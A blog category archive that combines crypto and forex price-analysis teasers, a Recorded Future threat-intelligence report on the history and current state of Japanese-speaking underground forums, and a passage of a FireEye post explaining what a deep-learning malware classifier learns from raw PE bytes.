Category Archives: Analysis

Forex Update: Trump Pressures Fed Ahead of Rate Decision

Forex Market Snapshot Asset Current Value Daily Change EUR/USD 1.1355 0.46% GBP/USD 1.2629 0.36% USD/JPY 112.72 -0.57% AUD/USD 0.7177 0.03% GOLD 1,250 0.64% WTI Crude Oil 49.99 -2.38% BTC/USD 3,543 10.91% The US Dollar has been at the center of attention again, as the last full trading week of the year started off in a […]

The post Forex Update: Trump Pressures Fed Ahead of Rate Decision appeared first on Hacked: Hacking Finance.

Pound Sterling Stems Decline

By Dmitriy Gurkovskiy, Chief Analyst at RoboMarkets On Monday morning, the British Pound stopped its significant decline against the USD, but it’s still pretty far from reaching stability. The British currency will remain under serious pressure until the country’s Parliament votes on the Brexit agreement with the European Union. We remind you that the voting […]

The post Pound Sterling Stems Decline appeared first on Hacked: Hacking Finance.

IOTA Price Analysis: MIOTA Has Made Encouraging Technical Progress

IOTA continue to expand and collaborate on new projects with other organizations. Bulls defy the odds to breakout from a bearish technical set up. Eyes on a recovery back towards pre-November drop levels. MIOTA price has gradually seen a renewed amount of bullish sentiment and is trading within its third consecutive session in the green. […]

The post IOTA Price Analysis: MIOTA Has Made Encouraging Technical Progress appeared first on Hacked: Hacking Finance.

Cardano Price Analysis: ADA Heading Higher Ahead of 1.4 Update

Charles Hoskinson confirmed via his Twitter account, the 1.4 update is scheduled for 18th. ADA against USD and BTC, and continues to move within a narrow range, subject to an imminent breakout. Cardano’s native token, ADA, continues to remain around depressed levels. Price action is moving within a narrow range, heading into the holiday season. This […]

The post Cardano Price Analysis: ADA Heading Higher Ahead of 1.4 Update appeared first on Hacked: Hacking Finance.

Tron Price Analysis: Fundamentals are Stronger than Ever; TRX Bulls Staging Comeback

Tron network has breached over 100 million transactions, as reported by Justin Sun. Zero transaction fees are anticipated on the Tron ecosystem, by Friday 21st TRX/USD has remained generally soft since the 29th November. The price has been cooling and ranging since its spike higher at the back end of November. TRX is remaining well […]

The post Tron Price Analysis: Fundamentals are Stronger than Ever; TRX Bulls Staging Comeback appeared first on Hacked: Hacking Finance.

Litecoin Price Analysis: LTC/USD E­­­njoys Double-Digit Gains as Lightening Network Seen Imminent

Litecoin has run higher by 20% over the past three sessions. The community of Litecoin is very much excited about the upcoming activation of the Litecoin Lightening Network. The Litecoin price is currently enjoying a bull run, running at its third consecutive session in the green. LTC/USD having gained a whopping 20% to the upside […]

The post Litecoin Price Analysis: LTC/USD E­­­njoys Double-Digit Gains as Lightening Network Seen Imminent appeared first on Hacked: Hacking Finance.

XRP/USD Price Analysis: Israel’s Largest Financial Services Company GMT Partnering with Ripple

Ripple has another large financial firm leveraging its technology, as the list keeps on growing. XRP/USD will search for buyers within $0.3000-$0.2500 range initially, ahead of possible $0.2000 return. XRP/BTC looks surprisingly encouraging, subject to a potential breakout to the upside. XRP in line with the rest of its peers across the cryptocurrency market remains […]

The post XRP/USD Price Analysis: Israel’s Largest Financial Services Company GMT Partnering with Ripple appeared first on Hacked: Hacking Finance.

Stellar Price Analysis: XLM/USD Bears Break Big $0.10 Level

Fear and panic spreads as XLM takes out another big psychological level, $0.10. Support of XLM continues to take place, as AlphaPoint and CoinField announce support. Stellar’s native token XLM has been a real victim of this heavy market selling pressure. The downward trend is very much stubborn and showing lack of a shift in […]

The post Stellar Price Analysis: XLM/USD Bears Break Big $0.10 Level appeared first on Hacked: Hacking Finance.

Forex Update: Dismal Chinese Data Causes Turmoil in Markets

Forex Market Snapshot Asset Current Value Daily Change EUR/USD 1.1302 -0.47% GBP/USD 1.2571 -0.68% USD/JPY 113.35 -0.21% AUD/USD 0.7179 -0.66% GOLD 1,243 -0.20% WTI Crude Oil 51.16 -3.18% BTC/USD 3,180 -2.54% We continue to have an unusually active December in traditional financial markets, as the recent bearish shift, the continued Brexit woes and the slowing […]

The post Forex Update: Dismal Chinese Data Causes Turmoil in Markets appeared first on Hacked: Hacking Finance.

XRP Trading Sideways as UAE Exchange Adopts Ripple for Overseas Payments

Ripple (XRP) is trading around $0.3030 on Friday, without any major changes, reports Dmitriy Gurkovskiy, Chief Analyst at RoboForex. The price tested the midterm descending channel resistance, and now is finishing its short term sideways correction. The XRP is trying to break out the local support, which would allow the price to go down to […]

The post XRP Trading Sideways as UAE Exchange Adopts Ripple for Overseas Payments appeared first on Hacked: Hacking Finance.

Crypto Update: Majors Testing Lows Following Broad Selloff

The major cryptocurrencies have been once again under pressure in the past 24 hours and most of the coins got very close to their recent lows, even as the losses are limited for now. While the top coins avoided a breakdown, given the overwhelmingly bearish long-term picture and the steep short-term trend, odds continue to […]

The post Crypto Update: Majors Testing Lows Following Broad Selloff appeared first on Hacked: Hacking Finance.

Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network

Swiss-based cryptocurrency organization, Bity, has added their support for XMR for use at ATM terminals. XMR/USD trading up on Friday, with gains of over 3% at the time of writing. Despite this, weekly chart view still points to the downside. XMR/USD is trading in positive territory on Friday, having gained over 3% during the session. […]

The post Monero Price Analysis: Wider Adoption Seen as Bity Adds XMR Support to Their ATM Network appeared first on Hacked: Hacking Finance.

Ripple Update: Bulls Poised to End Bear Market

Ripple (XRP/USD) came to life on September 18, 2018 when it breached resistance of $0.30. This sparked an unexpected yet strong rally to $0.79132 on September 21. In a matter of three days, Ripple skyrocketed by over 160%. The price action can make it seem that bulls have finally taken over the market. Unfortunately, the […]

The post Ripple Update: Bulls Poised to End Bear Market appeared first on Hacked: Hacking Finance.

The Unfolding History of Japanese-Speaking Underground Communities

Insikt Group

Click here to download the complete analysis as a PDF.

Click here to download the Japanese version of this analysis as a PDF.

Scope Note: Recorded Future collaborated with a Japanese security researcher with extensive knowledge in Japanese underground forums to explore the capabilities, cultures, and organization of Japanese hacking communities as a follow-up to Recorded Future’s previous piece on Chinese and Russian hacking communities. Sources the researcher used include direct forum access and actor engagement.

This report will be of greatest interest to organizations seeking to understand the Japanese-speaking criminal underground to better monitor industry and company-specific threats within the Japanese region, as well as to those investigating Japanese online criminal activity.

Executive Summary

Underground hacker communities have taken many forms, usually becoming an outlet for a country’s technologically educated to collaborate on projects and conduct business deals ranging from innocuous to illegal. It is no surprise then that Japan, as one of the most technologically developed countries in the world, would also have its own underground community. The Japanese underground consists of largely collaborative, anonymous forums, and a more aggressive cross-pollination between foreign and Japanese forum members than we have observed among their Chinese counterparts.

Key Judgments

  • Underground communities in Japan are relatively immature compared to their Chinese-, English-, or Russian-speaking counterparts. However, because interactions between Japanese hackers and their foreign counterparts are growing, Japanese hackers are likely to grow in number and sophistication in the future.
  • Illegal drug sales dominate Japanese underground content. Unlike English-speaking underground communities, no black market sites specifically for illicit content exist, and most sales threads are created on general-purpose forums or bulletin board systems (BBSes). Illegal drugs are sold by contacting an actor’s email within a sales thread and setting up an in-person meeting.
  • Unlike English, Russian, or other language communities, the adoption of Bitcoin as a form of online payment has been slow. Instead, prepaid gift cards, such as Amazon and iTunes gift cards, are used for payment.
  • A small portion of Japanese-speaking communities are formed inside sub-threads of English-speaking forums. Additionally, rather than using tools created themselves, Japanese hackers will often use external tools adopted by other hacking communities.

Background

Underground communities on the internet are prevalent in many languages and reside in a variety of forums. While some forums are hosted on websites easily searchable on the internet, some are also contained in mobile chat groups and even on websites hosted on the Tor hidden service or other overlay networks, which provide anonymity to internet connections. Sites advertising or discussing illegal content benefit from the Tor’s anonymous nature. A variety of these websites, including bulletin board systems (BBSes), will use this anonymity to specialize in illicit sexual content, hacking, and malware, as well as illegal drug and firearms trades. These marketplaces serve as platforms for safer trades of illegal goods such as drugs, firearms, forged identification documents, and credit card information stolen by hackers in exchange for anonymous cryptocurrencies, including Bitcoin and Monero.

Most of the examples above are found in English-, Chinese-, or Russian-speaking communities, but the majority of Japanese-speaking underground communities are housed within general-purpose bulletin board systems — a series of message boards and forums in which information is exchanged in posts among members. While some bulletin board systems are Tor websites, many of them are sites on the clear web, readily accessible through a general-purpose internet browser.

The History of Japanese Underground Communities

The history of underground communities in Japan dates back to the late 1990s. In 1996, the BBS forum Ayashii Warudo (Suspicious World) was created. This series of message boards was the largest of its kind in Japan. It was particularly revolutionary to netizens at the time, created during a transition period in which Japanese netizens were moving from closed community networks to the present internet forums. The website consisted of a simple textboard with multiple posts and comments, as well as a separate page for “link collection,” in which similar websites were advertised. This format soon became the template for multiple groups of websites sharing the same culture and the same site designs. Although new sites continued to spring up in the 2010s, the advent of social media sites equipped with more sophisticated functions caused posts on message boards to reduce in number.

Textboard Format

Textboard format example. (Source: Monafont Textboard)

In May 1999, an anonymous BBS called ni channeru (2channel) emerged with a catchphrase of “from hacking to what to cook for dinner,” where users could post about a broad range of topics. In 2017, 2channel changed its name to 5channel. It still remains one of the largest groups of message boards in Japan and served as the inspiration for the precursor of the American forum 4chan.

The 1990s represented the early days of the Japanese internet and, with only a limited number of users, accessing the Japanese internet itself made a user a part of the underground community. The internet communities listed above had developed their own culture, and there was a variety of categories of discussion available within these communities through message boards dedicated to different fields.

Hacker culture also led to the publication of books on hacking and the underground during this time, and Computer Aku No Manyuaru (Vicious Computer Manual) — published in March 1998 — sold over 100,000 copies. In July of that same year, “Hacker Japan” was launched and boasted the longest history among security periodicals in Japan until it was suspended in November 2013.

However, the internet does not operate in a vacuum. In 1999, the Act on Prohibition of Unauthorized Access, also known as the Unauthorized Computer Access Act, was enacted by the Japanese government. As internet access increased among the public and social media use began to rise, underground communities became less active.

Before the enactment of the Unauthorized Computer Access Act, a variety of illicit goods and services were casually exchanged in Japanese underground communities. Pirated goods, mainly in the form of pirated software (warez) and file-sharing software, were exchanged, in addition to pirated game ROMs and cheats. This was probably due to Japan’s low level of copyright enforcement in the late ‘90s and early 2000s. Hacking tools like phone phreaking technology, malware, and other cracking tools were also shared, along with small percentages of software reverse engineering tools. Many tools shared on Japanese forums around this time were originally developed by Japanese-speaking individuals. For example, Yoko Kuroki, a password analyzer released in January 2000 right before the Unauthorized Computer Access Act came into full effect, was developed by Japanese creators for a Japanese audience.

Yoko Kuroki Interface

Yoko Kuroki interface. (Source: Reitaku University)

Information on illegal drugs, firearms and explosives, and illegal organizations (like the Aum Shinrikyo cult), as well as other gossip or cold cases censored by broadcast television were also widely shared on BBSes. Such information was mostly out of the ordinary in its nature, and appealed to audiences looking for shocking or morbid content. Sites that provided such information gained popularity in the early 2000s, eventually giving birth to Gekiura Joho (Extraordinary Information), a forum dealing in morbid gossip. However, many of these gossip or tabloid-related sites have since been closed down or have evolved into general forums.

Gekiura Joho Homepage

Current Gekiura Joho homepage. (Source: https://gekiura.com/)

Current Landscape

Similar to their Chinese counterparts, Japanese forums largely do not compartmentalize wares into marketplaces, and instead advertise on general purpose forums, where discussions around hacking or other topics also occur. Most current Japanese underground interactions occur on the Onion Channel, the largest Japanese-speaking underground community today. This BBS opened in 2004, inspired by the previously created 2channel forum. While the Onion Channel is officially divided into three message boards of “Tor Ita” (tor board), “Eroi No” (pornography), and “Angura Ita” (underground board), all of them contain various subforums, with topics including illegal drugs, hacking, and illicit sexual content. All message boards offer a file upload feature through which files related to illicit sexual content, censored information, and stolen files are uploaded. This board shows that the underground community culture of the 1990s and 2000s is still alive and well, wielding a strong influence over their modern counterparts today.

Onion Channel

Tor board section of the Onion Channel.

Japanese-speaking underground communities constructed in the traditional BBS style allow anonymous posting with no account registration required, as opposed to English-speaking underground community forums that require sign-up. This site structure makes it difficult to eliminate spam posts and trolls, resulting in slow performance of these sites in general. Additionally, anonymity makes tracking actors on these sites incredibly difficult. For example, in August 2013, a large volume of membership information of 5channel Viewers, a paid service of the 5channel BBS, was leaked on the underground subsection of the Onion Channel. The media coverage of the incident made the Onion Channel widely known.

While many posts are anonymous, BBS sites like the Onion Channel are equipped with a function to allow users to enter a fixed handle name when posting a comment. To do so, the BBS requires a user to register through a “tripcode” system. This feature was adopted from 5channel. After a user enters a username and password, the BBS hashes the password to calculate an arbitrary string called a tripcode. This tripcode is then displayed in every post from the user alongside their username in the format “fixed handle name ◆ (tripcode).” If a password is accidentally leaked to the public domain, other individuals can spoof posts from the user by logging in with their account, as the tripcode remains the same after each login.

Other prominent Japanese underground forums include Kogarasu-maru and the now-unavailable Koushinkyo Cyber Division. Kogarasu-maru originally spun off from the Onion Channel and came to be used by Japanese hackers as a membership-only information sharing circle. Most Kogarasu-maru posts within this circle are related to hacking and maintaining anonymity online. Members will post on topics like “torrc settings optimization,” “how to improve anonymity with Whonix,” and “Kali Linux hacking tutorials.” Koushinkyo Cyber Division pages used to contain discussions mainly on hacking, carding, and anonymity among members.

Kogarasu-maru

Login section of Kogarasu-maru.

Unlike their Chinese counterparts, Japanese-speaking communities do not only rely on Japanese forums. In some cases, Japanese-speaking communities are formed inside subsections of English-speaking communities. Japanese hackers will also register accounts on non-Japanese message boards to gain information or access to services not readily accessible within domestic forums, like bulletproof hosting, which is more readily available on Russian- and English-language forums. Foreign communities will also occasionally flock to Japanese message boards to advertise online wares. There are also traces of posts made in non-fluent Japanese to advertise foreign message boards in Japanese-speaking communities.

Japanese Forum Post

Japanese forum post within a dark web community asking if anyone speaks an Asian language. (Source: Recorded Future)

As collaboration across Japanese and foreign forums has grown, preferred contact methods within the underground community in Japan has also begun to change. Until a few years ago, contact was made mainly through Yahoo Mail or disposable email addresses. However, the use of email services such as ProtonMail and Tutanota that are widely spread among English-speaking communities have begun to grow in popularity. The use of messenger services that specialize in privacy protection, like Telegram, Signal Private Messenger, Wickr, or Jabber, are also becoming more popular.

Content in Japanese Underground Forums

Malware and Data

Malware development is not a common pursuit within Japanese-speaking communities based on the rare number of malware development posts, but malware purchased or leaked from criminal communities overseas are actively sold. For example, ransomware originally created by a foreign actor will be co-opted by Japanese criminals, who write ransom letters in fluent Japanese to target Japanese hosts.

BBS Post

A BBS post advertising a CryptoLocker variant.

When it comes to data, Japanese hackers do not discriminate. Both domestic and international data is sold on Japanese underground forums, although in many cases it is not clear whether the data has been stolen by Japanese hackers themselves. For example, a May 2017 Japanese advertisement for Korean data was found on Kogarasu-maru, but seems to have been stolen by a hacker in a non-Japanese forum.

Japanese Ad

A Japanese ad on Kogarasu-maru selling a South Korean data dump.

Drugs, Weapons, and Illicit Sexual Content

The Japanese underground has a wide variety of drugs for sale, and drugs make up the majority of the posts. Just as it is in English, slang is often used in illegal drug and weapons trafficking in Japan. For example, on forum posts, cannabis is called “yasai,” and cocaine is called “chari,” while stimulant drugs are often referred to as “kori.” Additionally, weapons and illicit sexual content are occasionally advertised. Pistols, or “chaka,” are sometimes seen in forum advertisements on Japanese forums. Because all message boards offer a file upload feature and are anonymous by default, sellers can take advantage of this feature and share illicit content widely without fear of punishment.

In Japan, illegal drug sales are usually conducted in the form of an in-person transaction called “teoshi.” A seller will first post an advertising comment on a BBS such as “Osaka, Yasai, one gram, 5,000 yen,” with their contact information and will wait for buyers to send them an email. Buyers will contact the seller to meet at a specified location to conduct a transaction.

If sellers and buyers directly meet, they can complete transactions without leaving any evidence. Mail is discouraged as a form of drug transaction within Japan, both because some drug dealers have a habit of sending fake drugs, and because both domestic and international mail is screened before delivery. This is also why most drugs within the Japanese underground community are not ordered from other countries. Japanese customs is usually very effective at confiscating drugs and may directly visit the senders’ or buyers’ homes if the drugs were sent via mail. It is also understood among the users of English-speaking underground communities that no illegal drugs can be sent to Japan, and multiple drug-related English forums have discussed the efficacy of Japanese customs.

Reddit Post

Reddit post of users warning other drug users not to ship to Japan because of Japanese customs.

Bulletproof Hosting Services and VPNs

The opening of a website hosting content that is usually censored by the Japanese government requires a server that is impervious to takedown requests, so bulletproof hosting services are used. Recently, international providers offering bulletproof hosting services have expanded their advertising presence within Japanese-language forums. Until a decade ago, services such as 000WebHost and XREA were used within Japan. Now, overseas services such as Novogara LTD, BlazingFast, and AbeloHost are commonly used by the country’s hackers. Information about these services are obtained by Japanese hackers through relationships with hacker peers overseas.

The use of VPNs within Japan has had a similar evolution. A free VPN service called VPN Gate, provided by the University of Tsukuba, had many users. Documents describing how to maintain anonymity in Tor and VPN Gate written in English and Japanese were widely circulated among forums. However, after it became widely known that the Japanese police archived VPN Gate logs, posts advertising overseas VPNs such as ExpressVPN and ProtonVPN gradually increased.

Payment Methods

Unlike English-speaking or other hacker communities, the adoption of Bitcoin as a form of online payment among Japanese hackers has been slow. While cash transactions are primarily used when buying drugs, prepaid gift cards, such as Amazon and iTunes gift cards, are usually used for online payment on Japanese forums. This is because they are convenient for netizens to obtain anonymously within Japan, while cryptocurrencies require the opening of an account and presentation of ID documents at the exchange in order to be converted into cash. Prepaid gift cards are also incredibly easy to use online, as the only data required to use gift cards is the code written on the back of the card. Thus, posts requesting prepaid cards occasionally appear on Japanese message boards.

Outlook

Underground communities in Japan largely adhere to the culture of their predecessors from the early 1990s. However, due to an increasing cross-pollination between Japanese and foreign hackers, Japanese hackers have an opportunity to grow in both number and sophistication. As many Japanese subsections continue to grow within English-speaking community forums, and as Japanese hackers develop relationships with foreign hackers, it is likely that Japanese hackers will continue to explore websites in other countries to obtain information and online goods not available in Japan, as they have done to obtain malware and VPN access. Message boards taking on the format of international forums will possibly emerge, and may begin to grow more influential and larger than the Onion Channel itself.

The post The Unfolding History of Japanese-Speaking Underground Communities appeared first on Recorded Future.

     

IOTA Price Analysis: Audi and IOTA Partnership Moving Strong; Price Behaviour Not Reflecting That

IOTA and Audi partnership is said to be progressing forward, according to Audi representative. Price action for IOTA remains tilted to the downside, and a bearish technical set up eyed. IOTA (MIOTA) price remains very much depressed, in line with current stubborn market conditions. It continues to trade around the lowest levels seen since July […]

The post IOTA Price Analysis: Audi and IOTA Partnership Moving Strong; Price Behaviour Not Reflecting That appeared first on Hacked: Hacking Finance.

Crypto Update: Bear Market Lows in Jeopardy After Latest Failed Bounce

The cryptocurrency segment switched directions yet again, as, after a weak bounce on Wednesday, the major coins are headed back towards their recent bear market lows today. While the losses are not significant, for now, given the bearish long-term picture and the vicinity of the lows, another leg lower in the downtrend could soon begin, […]

The post Crypto Update: Bear Market Lows in Jeopardy After Latest Failed Bounce appeared first on Hacked: Hacking Finance.

Binance Coin Price Analysis: BNB Still in Trouble Despite Recent Strong Fundamental Prospects

BNB/USDT moving within an ascending channel formation, subject to a breakout to the downside. There is much anticipation ahead of Binance’s DEX launch, expected in early 2019. Binance Coin (BNB) has made a decent recovery since being slammed in November and into the early part of December. The price had initially dropped a whopping 58%, […]

The post Binance Coin Price Analysis: BNB Still in Trouble Despite Recent Strong Fundamental Prospects appeared first on Hacked: Hacking Finance.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown in the right side of Figure 3.  Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) is lost, and that the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

